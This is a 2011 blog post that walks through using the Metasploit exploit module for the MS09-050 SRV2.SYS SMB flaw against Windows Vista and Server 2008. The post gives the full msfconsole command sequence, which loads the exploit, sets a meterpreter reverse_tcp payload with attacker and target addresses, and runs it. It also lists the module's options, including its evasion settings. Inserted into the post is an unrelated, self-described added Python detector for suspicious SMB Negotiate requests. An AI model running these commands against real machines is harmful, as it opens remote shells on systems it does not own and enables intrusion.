Wednesday, 18 May 2011

Hacking Windows Vista, Windows 7, Windows 2008 Server - Metasploit Framework

Tool: Metasploit Framework
Download: http://www.metasploit.com/download/

Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference

This module exploits an out of bounds function table dereference in the SMB request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7 release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista without SP1 does not seem affected by this flaw.
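As an added example (not part of the original post and not code from the Metasploit module), the following Python shows the detection side of this flaw: it parses the NetBIOS session header and the 32-byte SMB1 header of a client request and flags a Negotiate Protocol request whose Process ID High field is non-zero. That field is the one MS09-050 turned into an out-of-range function-table index; Windows clients normally leave it zero, so a network sensor or log parser can alert on it. The two packets, the dialect strings and the 0x1234 value are constructed here for the demonstration and are not taken from any exploit.

```python
import struct
from dataclasses import dataclass

SMB1_MAGIC = b"\xffSMB"
SMB_COM_NEGOTIATE = 0x72
# SMB1 header (MS-CIFS): magic, command, status, flags, flags2, PIDHigh,
# signature, reserved, TID, PIDLow, UID, MID; little-endian, 32 bytes.
HEADER_FMT = "<4sBIBHH8sHHHHH"
HEADER_LEN = struct.calcsize(HEADER_FMT)


@dataclass
class Smb1Header:
    command: int
    status: int
    flags: int
    flags2: int
    pid_high: int
    signature: bytes
    tid: int
    pid_low: int
    uid: int
    mid: int


def parse_netbios_session(data: bytes) -> bytes:
    """Strip the 4-byte NetBIOS Session Service header (type + 3-byte length)."""
    if len(data) < 4:
        raise ValueError("short NetBIOS header")
    msg_type = data[0]
    length = int.from_bytes(data[1:4], "big")
    if msg_type != 0x00:
        raise ValueError(f"not a session message (type 0x{msg_type:02x})")
    body = data[4:4 + length]
    if len(body) != length:
        raise ValueError("truncated SMB message")
    return body


def parse_smb1_header(body: bytes) -> Smb1Header:
    """Decode the fixed SMB1 header; raise on anything that is not SMB1."""
    if len(body) < HEADER_LEN:
        raise ValueError("short SMB header")
    (magic, cmd, status, flags, flags2, pid_high, sig,
     _reserved, tid, pid_low, uid, mid) = struct.unpack_from(HEADER_FMT, body)
    if magic != SMB1_MAGIC:
        raise ValueError("not an SMB1 header")
    return Smb1Header(cmd, status, flags, flags2, pid_high, sig, tid, pid_low, uid, mid)


def check_negotiate(data: bytes) -> list:
    """Return findings for one client-to-server SMB message (empty list = clean)."""
    findings = []
    hdr = parse_smb1_header(parse_netbios_session(data))
    if hdr.command != SMB_COM_NEGOTIATE:
        return findings  # the MS09-050 condition only matters in Negotiate
    if hdr.pid_high != 0:
        findings.append(
            f"ProcessIDHigh=0x{hdr.pid_high:04x} in Negotiate Protocol request (expected 0)")
    return findings


def build_negotiate(pid_high: int, dialects) -> bytes:
    """Construct a minimal SMB_COM_NEGOTIATE request; used only as sample input here."""
    header = struct.pack(HEADER_FMT, SMB1_MAGIC, SMB_COM_NEGOTIATE, 0, 0x18, 0xC853,
                         pid_high, b"\x00" * 8, 0, 0, 0xFEFF, 0, 0)
    # Negotiate body: WordCount=0, ByteCount, then 0x02-prefixed NUL-terminated dialects
    payload = b"".join(b"\x02" + d + b"\x00" for d in dialects)
    body = header + b"\x00" + struct.pack("<H", len(payload)) + payload
    return b"\x00" + len(body).to_bytes(3, "big") + body


# Constructed samples: a normal request and one with a non-zero PIDHigh (0x1234 is arbitrary).
DIALECTS = [b"NT LM 0.12", b"SMB 2.002"]
BENIGN = build_negotiate(0x0000, DIALECTS)
SUSPECT = build_negotiate(0x1234, DIALECTS)

if __name__ == "__main__":
    for name, pkt in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(name, check_negotiate(pkt) or "clean")
```

The check is deliberately narrow: it fires only on SMB_COM_NEGOTIATE, so a non-zero PIDHigh in other commands (which some clients do set) does not produce noise, and the parser rejects anything that is not a well-formed SMB1 session message instead of guessing.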

Exploit Targets

* 0 - Windows Vista SP1/SP2 and Server 2008 (x86) (default)

Usage Information

$ msfconsole

msf > use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
msf exploit(ms09_050_smb2_negotiate_func_index) > show payloads
msf exploit(ms09_050_smb2_negotiate_func_index) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms09_050_smb2_negotiate_func_index) > set LHOST [MY IP ADDRESS]
msf exploit(ms09_050_smb2_negotiate_func_index) > set RHOST [TARGET IP]
msf exploit(ms09_050_smb2_negotiate_func_index) > exploit


Module Options

RHOST => The target address
RPORT => The target port (default: 445)
WAIT => The number of seconds to wait for the attack to complete. (default: 180)
CHOST => The local client address
CPORT => The local client port
ConnectTimeout => Maximum number of seconds to establish a TCP connection
ContextInformationFile => The information file that contains context information
DisablePayloadHandler => Disable the handler code for the selected payload
EnableContextEncoding => Use transient context when encoding payloads
NTLM::SendLM => Always send the LANMAN response (except when NTLMv2_session is specified)
NTLM::SendNTLM => Activate the 'Negotiate NTLM key' flag, indicating the use of NTLM responses
NTLM::SendSPN => Send an AV pair of type SPN in the NTLMv2 client blob; this allows authentication on Windows 7/2008 R2 when an SPN is required
NTLM::UseLMKey => Activate the 'Negotiate Lan Manager Key' flag, using the LM key when the LM response is sent
NTLM::UseNTLM2_session => Activate the 'Negotiate NTLM2 key' flag, forcing the use of a NTLMv2_session
NTLM::UseNTLMv2 => Use NTLMv2 instead of NTLM2_session when 'Negotiate NTLM2' key is true
Proxies => Use a proxy chain
SMB::ChunkSize => The chunk size for SMB segments, bigger values will increase speed but break NT 4.0 and SMB signing
SMB::Native_LM => The Native LM to send during authentication
SMB::Native_OS => The Native OS to send during authentication
SMB::VerifySignature => Enforces client-side verification of server response signatures
SMBDirect => The target port is a raw SMB service (not NetBIOS)
SMBDomain => The Windows domain to use for authentication
SMBName => The NetBIOS hostname (required for port 139 connections)
SMBPass => The password for the specified username
SMBUser => The username to authenticate as
SSL => Negotiate SSL for outgoing connections
SSLVersion => Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
WORKSPACE => Specify the workspace for this module
WfsDelay => Additional delay when waiting for a session
SMB::obscure_trans_pipe_level => Obscure PIPE string in TransNamedPipe (level 0-3)
SMB::pad_data_level => Place extra padding between headers and data (level 0-3)
SMB::pad_file_level => Obscure path names used in open/create (level 0-3)
SMB::pipe_evasion => Enable segmented read/writes for SMB Pipes
SMB::pipe_read_max_size => Maximum buffer size for pipe reads
SMB::pipe_read_min_size => Minimum buffer size for pipe reads
SMB::pipe_write_max_size => Maximum buffer size for pipe writes
SMB::pipe_write_min_size => Minimum buffer size for pipe writes
TCP::max_send_size => Maximum TCP segment size (0 = disable)
TCP::send_delay => Delay inserted before every send (0 = disable)

Source: http://www.metasploit.com/modules/exploit/windows/smb/ms09_050_smb2_negotiate_func_index
